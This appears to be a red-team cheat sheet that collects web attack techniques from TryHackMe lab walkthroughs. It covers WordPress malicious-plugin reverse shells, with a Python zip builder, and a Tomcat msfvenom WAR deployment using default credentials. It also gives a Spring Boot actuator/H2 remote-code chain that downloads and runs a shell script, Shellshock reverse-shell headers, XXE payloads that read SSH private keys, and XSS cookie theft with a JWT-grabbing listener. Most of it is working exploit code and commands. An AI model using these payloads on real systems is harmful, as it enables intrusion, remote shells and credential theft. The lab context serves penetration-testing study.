# Web

## Wordpress

### Reverse Shell #1 - Edit existing Plugin

**Examples**

[Wordpress: CVE-2021-29447](/red-team/walkthroughs/tryhackme/wordpress-cve-2021-29447.md#initial-shell)

**Kali**

```
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php 
```

Set `$ip` and `$port` at the top of `php-reverse-shell.php` to your listener. Then, in the WordPress admin, open Plugins > Plugin Editor, pick a file from an installed plugin (here `akismet/akismet.php`), replace its contents with the reverse shell and save. Because the plugin header comment is gone, the plugin no longer appears under Installed Plugins, but the file is still served from `wp-content/plugins/`.

<figure><img src="/files/BmpMWynb7mEiPbCXYSPS" alt=""><figcaption></figcaption></figure>

Start `nc -lvnp <port>` on Kali, then request the file directly to execute it. It does not have to be an active plugin: any PHP file under `wp-content/plugins/` runs when requested.

**Kali**

```
curl http://$VICTIM/wp-content/plugins/akismet/akismet.php
```

### Reverse Shell #2 - Upload Plugin

**Examples**

[Mr Robot CTF](/red-team/walkthroughs/tryhackme/mr-robot-ctf.md)

[Retro](/red-team/walkthroughs/tryhackme/retro.md)

**revshell.php code**

```
<?php
/* Plugin Name: revshell */
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
```

**Kali**

```
vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443
```

Upload the zip via Plugins > Add New > Upload Plugin. The PHP file needs a `/* Plugin Name: ... */` header comment, otherwise WordPress rejects the package with "No valid plugins were found." With the listener running, activate the plugin from Installed Plugins; including the file runs the `exec` call.
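The following script, an added example rather than code from the page, builds the plugin zip with the header WordPress checks for and packs the file inside a directory so it lands at a predictable path under `wp-content/plugins/`. The directory and file names (`revshell`, `revshell.php`) are assumptions; LHOST and LPORT come from the command line.

```python
"""Build a WordPress plugin zip carrying a PHP reverse shell (added example).

The zip must contain a .php file with a plugin header comment, otherwise the
uploader rejects it. Packing it inside a directory means the plugin is
installed as wp-content/plugins/<PLUGIN_DIR>/<PLUGIN_FILE>.
"""
import io
import sys
import zipfile

PLUGIN_DIR = "revshell"        # assumption: folder name inside the zip
PLUGIN_FILE = "revshell.php"   # assumption: file name inside that folder


def plugin_source(lhost: str, lport: int) -> str:
    """PHP source: a minimal plugin header plus the bash /dev/tcp one-liner."""
    return (
        "<?php\n"
        "/*\n"
        "Plugin Name: revshell\n"
        "Description: reverse shell plugin (pentest)\n"
        "Version: 1.0\n"
        "*/\n"
        # runs whenever WordPress includes the file (activation or direct request)
        f"exec(\"/bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'\");\n"
    )


def build_plugin_zip(lhost: str, lport: int) -> bytes:
    """Return the zip bytes to upload through Plugins > Add New > Upload Plugin."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{PLUGIN_DIR}/{PLUGIN_FILE}", plugin_source(lhost, lport))
    return buf.getvalue()


def list_plugins(zip_bytes: bytes) -> list:
    """Mirror the uploader's check: .php members whose header declares a Plugin Name."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".php") and "Plugin Name:" in zf.read(name).decode():
                found.append(name)
    return found


if __name__ == "__main__":
    # python3 build_plugin.py 10.10.10.10 443
    host, port = sys.argv[1], int(sys.argv[2])
    with open("revshell.zip", "wb") as fh:
        fh.write(build_plugin_zip(host, port))
    print("wrote revshell.zip; plugins found:", list_plugins(build_plugin_zip(host, port)))
```

Run it, start `nc -lvnp 443`, upload `revshell.zip` and activate the plugin.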

## Tomcat

### Common usernames and passwords

**Examples**

[Thompson](/red-team/walkthroughs/tryhackme/thompson.md)

`tomcat` / `s3cret` is the example account that older Tomcat releases ship commented out in `tomcat-users.xml`; try it against `/manager/html` before brute-forcing.

```
tomcat
s3cret
```

### Reverse Shell

**Examples**

[Thompson](/red-team/walkthroughs/tryhackme/thompson.md)

**Kali**

<pre><code><strong>msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
</strong>nc -lvnp 1337
</code></pre>

Deploy `rshell.war` through the Manager app (`/manager/html`, "WAR file to deploy") with the credentials found above, then request the new context, e.g. `http://$VICTIM:8080/rshell/`, to run the JSP and catch the shell on the listener.

<figure><img src="/files/QkQrt6CAcaKBzyoeStYE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/is76z8udo7tDYeVl0j7d" alt=""><figcaption></figcaption></figure>

## Spring Boot

### Reverse Shell

**Examples**

[Spring](/red-team/walkthroughs/tryhackme/spring.md#initial-shell)

**Exploit:** <https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database/>

**Kali #1**

```
tcpdump -i ens5 icmp
```

The chain from the write-up: the POST to `/actuator/env` sets the HikariCP `connection-test-query` property to H2 SQL that defines a Java alias around `Runtime.exec` and calls it; the POST to `/actuator/restart` rebuilds the context so the new pool runs that query on its first connection. The `x-9ad42dea0356cb04` header and its value are specific to the Spring room. The first run below only proves execution by pinging Kali (watch the tcpdump above); skip it if you don't need the check.

**Kali #2**

<pre><code>curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'ping -c 5 $KALI\');\"}' "https://$VICTIM/actuator/env" -k
<strong>
</strong>curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
</code></pre>

<figure><img src="/files/B8ML9W4Irpv9l7TMbOSY" alt=""><figcaption></figcaption></figure>

**reverse.sh**

```
bash -c "bash -i >& /dev/tcp/$KALI/1337 0>&1"
```

**Kali #1**

```
python3 -m http.server 81
```

**Kali #2**

```
nc -lvnp 1337
```

Download payload

**Kali #3**

```
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'wget http://$KALI:81/reverse.sh -O /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
```

Run payload

**Kali #3**

```
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'bash /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
```

<figure><img src="/files/kMI8J52X7sNtdFsrFgKU" alt=""><figcaption></figcaption></figure>

## See command output in page source

**Examples**

[Jack-of-All-Trades](/red-team/walkthroughs/tryhackme/jack-of-all-trades.md)

Sometimes the command output is in the HTML but not rendered, so you need to look at the page source.

```
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami
```

<figure><img src="/files/lM7jWHyyrIqw0Erw2mGB" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -lvnp 1337
```

**Browser**

```
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%20$KALI%201337
```

`nc -c` hands the connection to `/bin/sh` and only exists in netcat builds that implement it (`nc.traditional`, `ncat`); on OpenBSD `nc` the `-c` flag means TLS instead, so if the shell never arrives fall back to a URL-encoded `bash -i >& /dev/tcp/$KALI/1337 0>&1` payload.

## CGI-Bin

### Scanning

**Examples**

[0day](/red-team/walkthroughs/tryhackme/0day.md)

See if a `cgi-bin` folder appears in the initial scans; if it does, start scanning that directory for `.cgi` files.

**Kali**

```
gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi
```

<figure><img src="/files/QtfEfkXPig9USCQTz8U7" alt=""><figcaption></figcaption></figure>

### Shell

**Examples**

[0day](/red-team/walkthroughs/tryhackme/0day.md)

**Link:** <https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi>

This is Shellshock (CVE-2014-6271): the CGI server copies request headers into environment variables (`HTTP_COOKIE`, `HTTP_USER_AGENT`, ...), and a vulnerable bash executes whatever follows a value that starts with `() { :;};`. Any header works, not just `Cookie`, as long as the script ends up running under bash.

**Kali #1**

```
nc -lvnp 4242
```

**Kali #2**

```
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi 
```

<figure><img src="/files/DU2Vsue0LawNiU0USwiU" alt=""><figcaption></figcaption></figure>
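Before throwing a reverse shell at a CGI script it is worth confirming the bug with a harmless marker. The script below is an added example (not from the page): it checks whether the local bash still parses a function definition out of an environment variable, and runs the same test against a CGI URL by sending the trigger in a header. The URL, header name and marker string are assumptions.

```python
"""Shellshock (CVE-2014-6271) checks, local and remote (added example)."""
import os
import subprocess
import urllib.error
import urllib.request

MARKER = "shellshock-marker-7f3a"   # constructed; anything a normal response would not contain


def local_bash_vulnerable(bash: str = "bash") -> bool:
    """Export an env var that looks like a function definition with trailing
    commands; a vulnerable bash runs the trailing 'echo MARKER' on startup."""
    env = dict(os.environ, X=f"() {{ :; }}; echo {MARKER}")
    try:
        out = subprocess.run([bash, "-c", "echo ok"], env=env,
                             capture_output=True, text=True, timeout=10)
    except FileNotFoundError:
        return False
    return MARKER in out.stdout


def probe_payload() -> str:
    # "echo;" first: CGI output must start with headers and a blank line,
    # otherwise the server answers 500 (malformed header) and hides the output.
    return f"() {{ :; }}; echo; echo {MARKER}"


def shellshock_probe(url: str, header: str = "Cookie", timeout: int = 10) -> bool:
    """True if the marker comes back in the body, i.e. the header was executed."""
    req = urllib.request.Request(url, headers={header: probe_payload()})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:      # still inspect 500 bodies
        body = err.read().decode(errors="replace")
    return MARKER in body


if __name__ == "__main__":
    import sys
    print("local bash vulnerable:", local_bash_vulnerable())
    if len(sys.argv) > 1:      # python3 shellshock_check.py http://$VICTIM/cgi-bin/test.cgi
        print("remote vulnerable:", shellshock_probe(sys.argv[1]))
```

If the probe returns True, swap the marker for the `/bin/bash -i >& /dev/tcp/...` line in the curl above.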

## Change request type

**Examples**

[Mother's Secret](/red-team/walkthroughs/tryhackme/mothers-secret.md)

<figure><img src="/files/FqfcCpuugu4f4DccPR6t" alt=""><figcaption></figcaption></figure>

Change the request to POST and add everything else highlighted, we see the status message now changes.

<figure><img src="/files/PyvLx80DKDyYxyAVazyJ" alt=""><figcaption></figcaption></figure>

Now we change the YAML to the emergency override code mentioned in the room.

<figure><img src="/files/c3iBQ8Lpryv4mLpd1jvZ" alt=""><figcaption></figcaption></figure>

Now we perform the same steps again except this time for the api/nostromo route and the new file we discovered.

<figure><img src="/files/asrseGTgUG5FznSDQ5RA" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/GZP38BIseHwQspUUT3AW" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/tDCqliuRm4wE9BynqUwA" alt=""><figcaption></figcaption></figure>

## WebDAV - Cadaver

If the server runs WebDAV and we have credentials, we can log in with cadaver and upload files.

**Examples**

[Dav](/red-team/walkthroughs/tryhackme/dav.md)

**Kali**

<pre><code><strong>cadaver http://$VICTIM:80/webdav
</strong>Username: wampp
<strong>Password: xampp
</strong>dav:/webdav/> put shell.php shell.php
</code></pre>

`wampp` / `xampp` is the default WebDAV account shipped with XAMPP. After the `put`, request `http://$VICTIM/webdav/shell.php` with your listener running to execute it.

## XXE Injection

### Exploiting XXE - In-Band

**Examples**

[XXE Injection](/red-team/walkthroughs/tryhackme/xxe-injection.md#exploiting-xxe-in-band)

### Exploiting XXE - Out-of-Band

**Examples**

[XXE Injection](/red-team/walkthroughs/tryhackme/xxe-injection.md#exploiting-xxe-out-of-band)

### SSRF + XXE

**Examples**

[XXE Injection](/red-team/walkthroughs/tryhackme/xxe-injection.md#ssrf--xxe)

## XML-RPC

### Check if it is enabled

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)

wpscan or a directory scan may have identified that `xmlrpc.php` exists; if it does, check whether it is enabled by listing its methods:

```
POST /$SITE/xmlrpc.php HTTP/1.1
Host: $VICTIM
Content-Length: 91

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```

<figure><img src="/files/1tlBQLFjOpsqNqb6iAwA" alt=""><figcaption></figcaption></figure>

### View Files (XXE)

These are XXE payloads rather than XML-RPC calls: the entity is declared in the DOCTYPE and referenced inside an element the application echoes back (`<com>` and `<search>` below).

**Examples**

[Mustacchio](/red-team/walkthroughs/tryhackme/mustacchio.md)

[battery](/red-team/walkthroughs/tryhackme/battery.md#xee-read-files)

**Input**

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&xxe;</com>
</comment>
```

For PHP targets, read the file through `php://filter` so it comes back base64-encoded instead of being executed or breaking the XML; decode the result with `base64 -d`:

```
<!DOCTYPE replace [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=acc.php"> ]>

<search>&test;</search>
```
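To see why the `<comment>` payload above leaks the file, here is the same document shape run through a parser that resolves external entities and then through a hardened one. This is an added example (not from the page or from the XXE Injection room): the "key" is a constructed sample written to a temporary directory so it runs offline, where on a target the entity would point at `/home/barry/.ssh/id_rsa`.

```python
"""XXE: vulnerable vs hardened parsing of the <comment> payload (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


def xxe_document(file_url: str) -> bytes:
    """The page's payload with the target file parameterised."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!DOCTYPE root [<!ENTITY xxe SYSTEM '{file_url}'>]>\n"
        "<comment><name>Joe Hamd</name><author>Barry Clad</author>"
        "<com>&xxe;</com></comment>"
    ).encode()


class ComText(xml.sax.ContentHandler):
    """Collect the text of <com>, i.e. what the application would echo back."""
    def __init__(self):
        super().__init__()
        self.in_com = False
        self.text = []

    def startElement(self, name, attrs):
        self.in_com = name == "com"

    def endElement(self, name):
        if name == "com":
            self.in_com = False

    def characters(self, content):
        if self.in_com:
            self.text.append(content)


def parse_vulnerable(doc: bytes) -> str:
    """Resolving external general entities turns &xxe; into the file contents."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # the XXE-enabling setting
    handler = ComText()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc))
    return "".join(handler.text)


def parse_hardened(doc: bytes) -> str:
    """Refuse any DTD outright and keep external entity resolution off."""
    if b"<!DOCTYPE" in doc:
        raise ValueError("DTD not allowed")
    parser = xml.sax.make_parser()      # feature_external_ges stays off (the default)
    handler = ComText()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc))
    return "".join(handler.text)


def demo() -> str:
    """Write a constructed sample key to a temp file and leak it via XXE."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "id_rsa")
        with open(path, "w") as fh:
            fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed-sample-key\n")
        return parse_vulnerable(xxe_document("file://" + path))


if __name__ == "__main__":
    print(demo())
```

Rejecting the DOCTYPE rather than only disabling entity resolution makes the attempt fail loudly instead of silently returning an empty `<com>`.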

## XSS

### Reflected XSS

**Examples**

[XSS](/red-team/walkthroughs/tryhackme/xss.md#reflected-xss)

[XSS](/red-team/walkthroughs/tryhackme/xss.md#cve-2023-38501-vulnerable-web-application-1)

### Stored XSS

**Examples**

[XSS](/red-team/walkthroughs/tryhackme/xss.md#reflected-xss)

[XSS](/red-team/walkthroughs/tryhackme/xss.md#cve-2021-38757-vulnerable-web-application-2)

### Dom-Based XSS

**Examples**

[XSS](/red-team/walkthroughs/tryhackme/xss.md#dom-based-xss)

### XSS - Steal JWT

**Examples**

[The Marketplace](/red-team/walkthroughs/tryhackme/the-marketplace.md#xss-steal-jvt)

<https://jwt.io/>

<figure><img src="/files/c76dxz1YGo89EZbJ9ewa" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/QjIuCtQyfpSCfOlPAR8D" alt=""><figcaption></figcaption></figure>

I tried updating the token; it didn't work.

<figure><img src="/files/wzAqNdWzAz0UXdDKKz2i" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dhZI10AlVcc9hyj1ybJl" alt=""><figcaption></figcaption></figure>

Next we're going to try to steal the JWT from another user.

**Kali**

```
nc -lvnp 4444
```

**Browser**

```
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>
```

<figure><img src="/files/NFgOAQtfb7jmndwBgPUT" alt=""><figcaption></figcaption></figure>

This was annoying because if I went to my posts it wouldn't work, so I went to Jake's post and changed the number from 2 to 6 to get to the report page, then just clicked the report button.

<figure><img src="/files/4YdgzzkktKQHKMhS2x30" alt=""><figcaption></figcaption></figure>

We got a token from a user that isn't us.

<figure><img src="/files/vk7aJKw2reCLiXbCDCbh" alt=""><figcaption></figcaption></figure>

We can see it is from Michael who is an admin.

<figure><img src="/files/7CCCmQdmXENWULdCeYeN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LtpUF9NBn5akWy5z35V4" alt=""><figcaption></figcaption></figure>

Sent it again, but this time just forwarded the request so we could see what that script was doing.

<figure><img src="/files/zNLN0DB3IbN037txItTc" alt=""><figcaption></figcaption></figure>

The script was printing the flag.

<figure><img src="/files/Qb5zz4yJtO1349IdA16j" alt=""><figcaption></figcaption></figure>

This wasn't working before, but the next time I tried this box I could just update the cookie from the browser and it worked.

<figure><img src="/files/3D5fQV48YrTRiDJaGtew" alt=""><figcaption></figcaption></figure>

**Browser cookie**

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
```
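The `nc` listener above only shows the raw request line, so the cookie has to be copied out by hand and pasted into jwt.io. As an added example (not the page's code), the script below replaces the listener with one that pulls the `c=` parameter the XSS payload appends and decodes any JWT in it without a key, exactly what jwt.io shows. The token constant is the one captured above; the port and path are the page's, the cookie name is whatever the application uses.

```python
"""Catch document.cookie from the XSS callback and read the JWT claims (added example)."""
import base64
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# token captured above (page content)
CAPTURED = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9."
            "O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY")


def b64url_decode(segment: str) -> bytes:
    """JWT segments are unpadded base64url; restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> tuple:
    """(header, payload) as dicts. No signature check: anyone holding the token
    can read the claims; forging new ones would need the HS256 secret, which is
    why the page replays the token instead of editing it."""
    header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def cookie_from_path(path: str) -> str:
    """Extract the c= parameter the XSS payload appends (document.cookie)."""
    return parse_qs(urlparse(path).query).get("c", [""])[0]


class Grabber(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = cookie_from_path(self.path)
        if cookie:
            print("cookie from", self.client_address[0], ":", cookie)
            for part in cookie.split("; "):
                name, _, value = part.partition("=")
                if value.count(".") == 2:            # looks like a JWT
                    try:
                        print(name, "->", decode_jwt_unverified(value)[1])
                    except ValueError:
                        pass
        self.send_response(204)
        self.end_headers()


if __name__ == "__main__":
    # same port as the nc listener; the /XSS/grabber.php path in the payload is arbitrary
    HTTPServer(("0.0.0.0", 4444), Grabber).serve_forever()
```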

## CSRF

**Examples**

[CSRF](/red-team/walkthroughs/tryhackme/csrf.md)

